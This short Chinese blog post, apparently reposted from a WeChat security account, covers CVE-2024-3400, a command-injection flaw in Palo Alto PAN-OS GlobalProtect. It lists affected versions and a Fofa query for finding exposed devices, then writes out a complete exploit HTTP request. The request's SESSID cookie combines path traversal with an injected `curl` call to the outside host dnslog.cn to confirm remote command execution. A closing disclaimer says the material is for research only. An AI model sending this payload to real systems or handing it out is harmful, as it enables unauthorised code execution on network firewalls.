version < 11.0.4-h1
version < 10.2.9-h1
version < 10.2.8-h3
version < 10.2.7-h8
version < 10.2.6-h3
version < 11.1.0-h3
version < 11.1.2-h3
version < 11.0.2-h4
version < 11.0.3-h10
Fofa: app="PaloAlto-GlobalProtect"
构造payload,发送数据包
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host:
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}dnslog.cn`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
查看dnslog记录
关注厂商更新产品:
https://www.paloaltonetworks.com/
https://nvd.nist.gov/vuln/detail/CVE-2024-3400
原文始发于微信公众号(SheYin):(CVE-2024-3400)Palo Alto Networks PAN-OS 命令执行漏洞(附edusrc邀请码)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论